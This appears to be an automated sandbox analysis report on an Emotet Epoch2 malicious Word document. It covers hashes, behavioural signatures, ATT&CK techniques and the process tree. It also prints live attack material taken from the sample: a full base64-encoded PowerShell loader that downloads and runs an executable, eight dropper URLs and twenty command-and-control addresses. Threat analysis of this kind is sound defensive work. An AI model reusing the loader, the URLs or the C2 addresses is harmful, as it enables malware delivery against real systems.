emotet | 6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495

General

Target

emotet_e2_6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495_2020-10-27__231258998145._fpx.doc
Size

191KB
MD5

5380ac7e6bb601430d526324efcb3be1
SHA1

3a2e6649282590cf90ad5438966c96d412ac11ec
SHA256

6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495
SHA512

246ccb0a5b1abc6a248d4e34affeb0607d4df20f6d39a16a498da56d4125fbd778be4a2b4e6b02f0f4b3f1d494101a2c5edc227cdd969a88cca0efaf1591ffe2

Score

10^/10

emotet epoch2 banker trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://mueindustries.com/wp-admin/D/

exe.dropper

http://biharbhumibazar.com/wp-admin/D/

exe.dropper

http://jiehost.com/wp-admin/6ZFh6A/

exe.dropper

http://fit.develab.mx/wp-admin/sjai4FA/

exe.dropper

http://weeklyoutfits.com/how-much/zw2z/

exe.dropper

http://personalizedjigsaws.com/replace_img/qG6D9T/

exe.dropper

http://stabri-thailand.org/cgi-bin/1GKI/

exe.dropper

http://odmova.pl/retranslate/OqLdry/

Extracted

Family

emotet

Botnet

Epoch2

C2

88.153.35.32:80

107.170.146.252:8080

173.212.214.235:7080

167.114.153.111:8080

67.170.250.203:443

121.124.124.40:7080

103.86.49.11:8080

74.214.230.200:80

194.187.133.160:443

172.104.97.173:8080

172.91.208.86:80

200.116.145.225:443

202.134.4.216:8080

172.105.13.66:443

190.164.104.62:80

50.35.17.13:80

176.111.60.55:8080

201.241.127.190:80

66.76.12.94:8080

95.213.236.64:8080

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

POwersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4356	2992	POwersheLL.exe

Emotet Payload 4 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral2/memory/4544-10-0x00000000022F0000-0x0000000002323000-memory.dmp	emotet
behavioral2/memory/4544-11-0x0000000002330000-0x0000000002361000-memory.dmp	emotet
behavioral2/memory/4744-14-0x0000000002130000-0x0000000002163000-memory.dmp	emotet
behavioral2/memory/4744-15-0x0000000002170000-0x00000000021A1000-memory.dmp	emotet

Blacklisted process makes network request 1 IoCs

Processes:

POwersheLL.exe

flow pid process

15 4356 POwersheLL.exe
Executes dropped EXE 2 IoCs

Processes:

Ekkzsyr.exesamcli.exe

pid process

4544 Ekkzsyr.exe
4744 samcli.exe
Drops file in System32 directory 1 IoCs

Processes:

Ekkzsyr.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\PhoneutilRes\samcli.exe Ekkzsyr.exe

flow	pid	process
15	4356	POwersheLL.exe

pid	process
4544	Ekkzsyr.exe
4744	samcli.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\PhoneutilRes\samcli.exe	Ekkzsyr.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE

Modifies data under HKEY_USERS 1 IoCs

Processes:

svchost.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey svchost.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

4756 WINWORD.EXE
4756 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

POwersheLL.exesamcli.exe

pid process

4356 POwersheLL.exe
4356 POwersheLL.exe
4356 POwersheLL.exe
4744 samcli.exe
4744 samcli.exe
4744 samcli.exe
4744 samcli.exe
4744 samcli.exe
4744 samcli.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

POwersheLL.exe

description pid process

Token: SeDebugPrivilege 4356 POwersheLL.exe
Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

WINWORD.EXEEkkzsyr.exesamcli.exe

pid process

4756 WINWORD.EXE
4756 WINWORD.EXE
4756 WINWORD.EXE
4756 WINWORD.EXE
4756 WINWORD.EXE
4756 WINWORD.EXE
4756 WINWORD.EXE
4544 Ekkzsyr.exe
4744 samcli.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey	svchost.exe

pid	process
4756	WINWORD.EXE
4756	WINWORD.EXE

pid	process
4356	POwersheLL.exe
4356	POwersheLL.exe
4356	POwersheLL.exe
4744	samcli.exe
4744	samcli.exe
4744	samcli.exe
4744	samcli.exe
4744	samcli.exe
4744	samcli.exe

description	pid	process
Token: SeDebugPrivilege	4356	POwersheLL.exe

pid	process
4756	WINWORD.EXE
4756	WINWORD.EXE
4756	WINWORD.EXE
4756	WINWORD.EXE
4756	WINWORD.EXE
4756	WINWORD.EXE
4756	WINWORD.EXE
4544	Ekkzsyr.exe
4744	samcli.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

Ekkzsyr.exe

description	pid	process	target process
PID 4544 wrote to memory of 4744	4544	Ekkzsyr.exe	samcli.exe
PID 4544 wrote to memory of 4744	4544	Ekkzsyr.exe	samcli.exe
PID 4544 wrote to memory of 4744	4544	Ekkzsyr.exe	samcli.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495_2020-10-27__231258998145._fpx.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4756

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -ENCOD IAAgAHMAdgAgACAAeAA4AFkAZQBJAFMAIAAgACgAIAAgAFsAdABZAHAARQBdACgAIgB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADEAfQB7ADIAfQAiAC0AZgAnAHMAWQBzAHQAJwAsACcAUgBlAEMAJwAsACcAVABPAFIAeQAnACwAJwBlACcALAAnAG0ALgBJAE8ALgBkACcALAAnAGkAJwApACAAIAApACAAOwAgACAAIABTAGUAdAAtAEkAVABFAG0AIAAgAFYAQQBSAGkAQQBCAEwAZQA6AEMAZgBMACAAKAAgAFsAVAB5AHAARQBdACgAIgB7ADIAfQB7ADUAfQB7ADgAfQB7ADcAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADMAfQB7ADAAfQAiAC0ARgAgACcAUgAnACwAJwBuAHQAbQAnACwAJwBzACcALAAnAGEATgBhAGcAZQAnACwAJwBFACcALAAnAFkAcwB0AEUATQAuAE4ARQBUACcALAAnAHAAbwBJACcALAAnAEkAYwAnACwAJwAuAFMAZQBSAHYAJwApACkAOwAgACAAJABYAGoAeQBwAHUAbQAzAD0AKAAnAE4AJwArACgAJwAyAGQAaABzACcAKwAnAGEAJwApACsAJwB3ACcAKQA7ACQAUwBsAGYAMAA3AHQAZgA9ACQARwBnADYANQBoAHAAZwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQARgA5ADgAdABqAGIAdQA7ACQARQBuAGIAeAA2ADEAdwA9ACgAJwBTAG4AJwArACgAJwA1ADMAJwArACcANQA3ADMAJwApACkAOwAgACgAIAAgAEcAZQBUAC0AQwBoAEkATABEAGkAVABFAE0AIAB2AEEAUgBpAGEAYgBMAGUAOgBYADgAWQBFAGkAcwAgACAAKQAuAFYAQQBsAFUARQA6ADoAIgBDAFIAZQBBAGAAVABlAGQASQByAGUAYwBgAFQAYABPAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAcABQAHgAJwArACcAVABzADAAbgBzADgAJwApACsAJwBjACcAKwAoACcAcAAnACsAJwBQAHgAUQAnACkAKwAoACcANgBzACcAKwAnADQAYgAnACkAKwAoACcAYgBmAHAAJwArACcAUAB4ACcAKQApAC4AIgByAGUAcABgAGwAYQBgAEMARQAiACgAKABbAEMAaABBAHIAXQAxADEAMgArAFsAQwBoAEEAcgBdADgAMAArAFsAQwBoAEEAcgBdADEAMgAwACkALAAnAFwAJwApACkAKQA7ACQARgB2AHQANwBoAG0AdgA9ACgAJwBCACcAKwAoACcAdgBoACcAKwAnAHcAcQBqACcAKQArACcAbAAnACkAOwAgACQAYwBGAGwAOgA6ACIAUwBgAGUAYABDAGAAVQBgAFIAaQB0AHkAUAByAG8AVABgAE8AQwBvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEYAcABiAGUAMABfAGMAPQAoACcATwBxACcAKwAoACcAZAA1ACcAKwAnAHYAcAAnACkAKwAnAGsAJwApADsAJABMAG8AbQB3AGwAZgA0ACAAPQAgACgAJwBFACcAKwAnAGsAJwArACgAJwBrAHoAcwAnACsAJwB5AHIAJwApACkAOwAkAFUAdgB1AGsAcwBfAF8APQAoACgAJwBCAG0AdQAnACsAJwBvACcAKQArACcANQB4ACcAKwAnAHkAJwApADsAJABOAGEAbAAyAGkAMwA3AD0AKAAnAEgANgAnACsAJwBxAGYAJwArACgAJwAwAHgAJwArACcAXwAnACkAKQA7ACQASQBuAG0ANAB0AHgAMAA9ACQASABPAE0ARQArACgAKAAnAFQAJwArACgAJwA3AFAAVABzACcAKwAnADAAbgAnACsAJwBzADgAYwAnACkAKwAnAFQAJwArACgAJwA3ACcAKwAnAFAAUQAnACsAJwA2AHMANAAnACkAKwAoACcAYgAnACsAJwBiAGYAVAAnACkAKwAnADcAUAAnACkAIAAtAEMAcgBFAHAAbABhAEMARQAgACgAJwBUACcAKwAnADcAUAAnACkALABbAEMAaABhAHIAXQA5ADIAKQArACQATABvAG0AdwBsAGYANAArACgAJwAuACcAKwAoACcAZQAnACsAJwB4AGUAJwApACkAOwAkAFkAaABuAG8AcQAzAGEAPQAoACcATQAnACsAJwB4ADMAJwArACgAJwBqACcAKwAnADYANwB0ACcAKQApADsAJABYAHgAdwBrADIANgB6AD0ALgAoACcAbgAnACsAJwBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABuAGUAdAAuAFcAZQBCAGMATABpAEUATgB0ADsAJABYAHYAbQA5AGcAbwB5AD0AKAAoACcAaAB0AHQAcAAnACsAJwA6AFsAJwArACcAIAB1AE4ASABzACAAXQBbACAAJwArACcAdQBOAEgAcwAgAF0AbQAnACkAKwAoACcAdQBlAGkAJwArACcAbgBkACcAKQArACgAJwB1AHMAJwArACcAdAByACcAKwAnAGkAZQBzAC4AJwArACcAYwBvAG0AWwAnACsAJwAgAHUATgBIACcAKQArACgAJwBzACcAKwAnACAAXQB3AHAALQAnACkAKwAoACcAYQBkAG0AaQAnACsAJwBuAFsAIAAnACsAJwB1ACcAKQArACcATgAnACsAKAAnAEgAcwAgACcAKwAnAF0ARAAnACkAKwAoACcAWwAgACcAKwAnAHUATgBIAHMAJwApACsAKAAnACAAXQBAAGgAdAAnACsAJwB0ACcAKwAnAHAAJwApACsAKAAnADoAJwArACcAWwAgACcAKQArACgAJwB1ACcAKwAnAE4ASAAnACkAKwAoACcAcwAnACsAJwAgAF0AWwAnACkAKwAnACAAJwArACcAdQBOACcAKwAnAEgAcwAnACsAJwAgACcAKwAoACcAXQBiAGkAJwArACcAaAAnACkAKwAoACcAYQByACcAKwAnAGIAaAB1ACcAKwAnAG0AJwApACsAKAAnAGkAYgBhAHoAJwArACcAYQByAC4AJwApACsAKAAnAGMAbwAnACsAJwBtACcAKQArACgAJwBbACAAJwArACcAdQAnACkAKwAoACcATgAnACsAJwBIAHMAIAAnACsAJwBdAHcAcAAtACcAKwAnAGEAZABtAGkAJwApACsAJwBuAFsAJwArACgAJwAgACcAKwAnAHUATgBIAHMAIABdACcAKwAnAEQAWwAnACkAKwAoACcAIAB1ACcAKwAnAE4ASAAnACsAJwBzACAAXQAnACkAKwAoACcAQABoACcAKwAnAHQAdABwACcAKwAnADoAWwAnACkAKwAoACcAIAB1AE4ASAAnACsAJwBzACAAXQAnACsAJwBbACcAKwAnACAAdQBOACcAKQArACgAJwBIAHMAIABdACcAKwAnAGoAaQAnACsAJwBlACcAKQArACgAJwBoACcAKwAnAG8AcwAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtAFsAIAB1AE4AJwApACsAKAAnAEgAcwAgACcAKwAnAF0AJwApACsAKAAnAHcAcAAtAGEAJwArACcAZABtAGkAbgBbACcAKwAnACAAdQBOACcAKwAnAEgAJwApACsAKAAnAHMAIABdADYAJwArACcAWgBGAGgANgAnACsAJwBBAFsAJwApACsAKAAnACAAdQBOAEgAJwArACcAcwAgACcAKwAnAF0AJwApACsAKAAnAEAAaAAnACsAJwB0ACcAKQArACgAJwB0ACcAKwAnAHAAOgBbACAAJwApACsAKAAnAHUAJwArACcATgBIAHMAJwArACcAIABdAFsAIAB1ACcAKQArACgAJwBOACcAKwAnAEgAJwArACcAcwAgAF0AZgBpAHQAJwApACsAKAAnAC4AZAAnACsAJwBlAHYAJwApACsAKAAnAGUAbABhACcAKwAnAGIAJwApACsAKAAnAC4AJwArACcAbQAnACsAJwB4AFsAIAAnACsAJwB1AE4ASABzACAAXQB3AHAALQBhACcAKwAnAGQAJwApACsAJwBtACcAKwAnAGkAbgAnACsAJwBbACcAKwAoACcAIAB1ACcAKwAnAE4ASAAnACkAKwAoACcAcwAnACsAJwAgAF0AJwApACsAKAAnAHMAJwArACcAagBhACcAKQArACgAJwBpADQARgBBAFsAJwArACcAIAB1AE4AJwArACcASAAnACsAJwBzACAAXQAnACkAKwAnAEAAaAAnACsAKAAnAHQAdABwADoAWwAgAHUATgAnACsAJwBIACcAKQArACgAJwBzACAAXQAnACsAJwBbACAAJwArACcAdQBOACcAKQArACgAJwBIAHMAJwArACcAIABdACcAKwAnAHcAZQBlAGsAbAB5ACcAKQArACcAbwB1ACcAKwAoACcAdABmACcAKwAnAGkAdAAnACkAKwAoACcAcwAnACsAJwAuAGMAbwAnACkAKwAoACcAbQAnACsAJwBbACAAdQAnACsAJwBOAEgAcwAnACkAKwAoACcAIABdAGgAJwArACcAbwB3ACcAKQArACgAJwAtAG0AJwArACcAdQBjACcAKQArACcAaAAnACsAKAAnAFsAJwArACcAIAB1ACcAKQArACgAJwBOACcAKwAnAEgAcwAgACcAKQArACgAJwBdACcAKwAnAHoAdwAnACkAKwAnADIAJwArACcAegBbACcAKwAnACAAdQAnACsAKAAnAE4ASABzACcAKwAnACAAXQAnACsAJwBAAGgAdAB0ACcAKQArACgAJwBwADoAWwAnACsAJwAgAHUATgBIAHMAJwArACcAIABdACcAKQArACgAJwBbACAAdQAnACsAJwBOAEgAJwArACcAcwAgAF0AcAAnACsAJwBlAHIAJwArACcAcwBvACcAKQArACgAJwBuAGEAbAAnACsAJwBpACcAKQArACgAJwB6AGUAZAAnACsAJwBqACcAKQArACcAaQBnACcAKwAnAHMAYQAnACsAKAAnAHcAJwArACcAcwAuAGMAbwBtAFsAJwApACsAKAAnACAAJwArACcAdQBOAEgAJwApACsAJwBzACcAKwAoACcAIABdAHIAZQAnACsAJwBwAGwAYQBjACcAKwAnAGUAXwBpACcAKwAnAG0AZwAnACkAKwAoACcAWwAgAHUAJwArACcATgBIACcAKwAnAHMAIAAnACkAKwAoACcAXQBxAEcANgBEACcAKwAnADkAJwApACsAJwBUACcAKwAnAFsAJwArACcAIAB1ACcAKwAnAE4AJwArACgAJwBIAHMAIABdAEAAJwArACcAaAAnACkAKwAoACcAdAB0AHAAOgAnACsAJwBbACAAJwArACcAdQBOAEgAcwAgACcAKQArACgAJwBdAFsAJwArACcAIAB1AE4AJwApACsAKAAnAEgAcwAnACsAJwAgAF0AJwApACsAJwBzACcAKwAoACcAdABhAGIAJwArACcAcgBpACcAKQArACgAJwAtACcAKwAnAHQAaABhAGkAJwApACsAKAAnAGwAJwArACcAYQBuACcAKQArACgAJwBkAC4AbwByACcAKwAnAGcAWwAnACkAKwAnACAAJwArACgAJwB1AE4AJwArACcASAAnACkAKwAoACcAcwAgACcAKwAnAF0AYwBnAGkALQBiAGkAJwArACcAbgAnACkAKwAoACcAWwAgAHUAJwArACcATgBIAHMAJwArACcAIAAnACsAJwBdADEAJwApACsAJwBHAEsAJwArACcASQBbACcAKwAoACcAIAB1AE4ASAAnACsAJwBzACAAXQBAACcAKwAnAGgAJwArACcAdAAnACkAKwAnAHQAJwArACgAJwBwADoAJwArACcAWwAnACkAKwAoACcAIAB1AE4AJwArACcASABzACAAJwApACsAKAAnAF0AWwAnACsAJwAgAHUAJwApACsAJwBOAEgAJwArACcAcwAnACsAKAAnACAAJwArACcAXQBvAGQAJwApACsAJwBtAG8AJwArACgAJwB2ACcAKwAnAGEAJwArACcALgBwAGwAWwAgACcAKwAnAHUATgBIAHMAJwArACcAIABdAHIAJwApACsAKAAnAGUAdAAnACsAJwByAGEAJwApACsAKAAnAG4AcwBsACcAKwAnAGEAJwApACsAKAAnAHQAZQAnACsAJwBbACAAJwApACsAJwB1ACcAKwAoACcATgAnACsAJwBIAHMAJwApACsAJwAgAF0AJwArACgAJwBPAHEATABkAHIAeQBbACcAKwAnACAAJwArACcAdQBOAEgAcwAgACcAKQArACcAXQAnACkALgAiAFIARQBwAGwAYABBAEMAZQAiACgAKAAoACcAWwAgACcAKwAnAHUATgBIACcAKQArACcAcwAgACcAKwAnAF0AJwApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACcAZgBzACcAKQBbADAAXQApAC4AIgBTAFAAYABsAGkAdAAiACgAJABRAGIAZgBzAG4AMQB3ACAAKwAgACQAUwBsAGYAMAA3AHQAZgAgACsAIAAkAFMAOABfAHkAdQA1AHQAKQA7ACQASgBiAHAAdwBqAGsANAA9ACgAKAAnAFoAMQAnACsAJwBrAHcAJwApACsAJwBfAHgAJwArACcANAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFkAegAwAHkAMQAyADcAIABpAG4AIAAkAFgAdgBtADkAZwBvAHkAKQB7AHQAcgB5AHsAJABYAHgAdwBrADIANgB6AC4AIgBkAGAATwB3AGAATgBsAG8AQQBkAGYAaQBsAGUAIgAoACQAWQB6ADAAeQAxADIANwAsACAAJABJAG4AbQA0AHQAeAAwACkAOwAkAEkANwBzADgAcwByAGYAPQAoACcAUAAnACsAKAAnAG0AJwArACcAegB1ADMAbgBiACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEkAbgBtADQAdAB4ADAAKQAuACIATABlAG4AYABHAFQASAAiACAALQBnAGUAIAA0ADIANAA5ADgAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACgAKAAnAHcAJwArACcAaQBuADMAMgAnACkAKwAoACcAXwAnACsAJwBQAHIAbwBjAGUAJwArACcAcwAnACkAKwAnAHMAJwApACkALgAiAEMAUgBgAGUAYQBUAGUAIgAoACQASQBuAG0ANAB0AHgAMAApADsAJABKADcANQBxADkAawBtAD0AKAAnAEsAcwAnACsAKAAnAHkAcABhACcAKwAnAGIAJwApACsAJwBjACcAKQA7AGIAcgBlAGEAawA7ACQATwBsAHkAbQB3ADgANwA9ACgAKAAnAEUAJwArACcAXwA5ACcAKQArACgAJwB3AGoAJwArACcAMAAnACkAKwAnAHcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABSAHIAdwAyAF8AMABwAD0AKAAnAEUAJwArACcAeQAnACsAKAAnAGQAJwArACcAMABzADUAdwAnACkAKQA=
1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4356

C:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exe
C:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4544

C:\Windows\SysWOW64\PhoneutilRes\samcli.exe
"C:\Windows\SysWOW64\PhoneutilRes\samcli.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4744

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NgcSvc
1⤵
PID:4516

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService
1⤵
PID:4576

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s NgcCtnrSvc
1⤵
- Modifies data under HKEY_USERS
PID:4664

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exe
MD5
8d1cae4e7c6d2d234a74b39708ba1e74

SHA1
e90eb1c1b573b2d0d1a5dc49e45befc7cf3ce49a

SHA256
37ba2708fea2f95868f0af1e162aedc90acb0326cf3a013fc760d5c4ea67adee

SHA512
7fd4bba03c6f085ade9e043f03a57d6efc689ec2a6f0d45fff75096c38008d3d3832806152fd2970451a956e39af4f59e75124861892e489feedec55249672e1

Download Submit
C:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exe
MD5
8d1cae4e7c6d2d234a74b39708ba1e74

SHA1
e90eb1c1b573b2d0d1a5dc49e45befc7cf3ce49a

SHA256
37ba2708fea2f95868f0af1e162aedc90acb0326cf3a013fc760d5c4ea67adee

SHA512
7fd4bba03c6f085ade9e043f03a57d6efc689ec2a6f0d45fff75096c38008d3d3832806152fd2970451a956e39af4f59e75124861892e489feedec55249672e1

Download Submit
C:\Windows\SysWOW64\PhoneutilRes\samcli.exe
MD5
8d1cae4e7c6d2d234a74b39708ba1e74

SHA1
e90eb1c1b573b2d0d1a5dc49e45befc7cf3ce49a

SHA256
37ba2708fea2f95868f0af1e162aedc90acb0326cf3a013fc760d5c4ea67adee

SHA512
7fd4bba03c6f085ade9e043f03a57d6efc689ec2a6f0d45fff75096c38008d3d3832806152fd2970451a956e39af4f59e75124861892e489feedec55249672e1

Download Submit
memory/4356-5-0x00007FFE87170000-0x00007FFE87B5C000-memory.dmp

Filesize
9.9MB

Download
memory/4356-6-0x000001D0EB9A0000-0x000001D0EB9A1000-memory.dmp

Filesize
4KB

Download
memory/4356-7-0x000001D0EBBB0000-0x000001D0EBBB1000-memory.dmp

Filesize
4KB

Download
memory/4544-11-0x0000000002330000-0x0000000002361000-memory.dmp

Filesize
196KB

Download
memory/4544-10-0x00000000022F0000-0x0000000002323000-memory.dmp

Filesize
204KB

Download
memory/4744-12-0x0000000000000000-mapping.dmp

Download
memory/4744-14-0x0000000002130000-0x0000000002163000-memory.dmp

Filesize
204KB

Download
memory/4744-15-0x0000000002170000-0x00000000021A1000-memory.dmp

Filesize
196KB

Download
memory/4756-4-0x000001FF718B0000-0x000001FF718B5000-memory.dmp

Filesize
20KB

Download
memory/4756-3-0x000001FF6F10D000-0x000001FF6F112000-memory.dmp

Filesize
20KB

Download
memory/4756-2-0x000001FF71710000-0x000001FF71719000-memory.dmp

Filesize
36KB

Download
memory/4756-0-0x000001FF66480000-0x000001FF66AB7000-memory.dmp

Filesize
6.2MB

Download
memory/4756-1-0x000001FF71719000-0x000001FF7171C000-memory.dmp

Filesize
12KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads